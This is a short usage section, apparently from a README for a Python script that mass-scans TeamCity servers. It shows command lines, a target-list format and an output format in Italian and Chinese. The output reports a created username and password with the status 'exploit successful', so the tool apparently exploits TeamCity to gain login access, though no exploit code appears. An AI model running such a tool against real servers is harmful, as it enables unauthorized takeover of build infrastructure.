
bash
python teamcity_scan.py -f targets.txt -o results.txt
python teamcity_scan.py -u http://target.com:8111 -o result.txt
python teamcity_scan.py -f urls.txt -t 20 -o vuln.txt
Formato del file target (targets.txt): text http://192.168.1.100:8111 https://teamcity.example.com 10.0.0.1:8111 example.com
Formato di output (results.txt): text 目标: http://192.168.1.100:8111 用户名: TeamCityUser1234 密码: TeamCity@2023 登录地址: http://192.168.1.100:8111/login.html 状态: 漏洞利用成功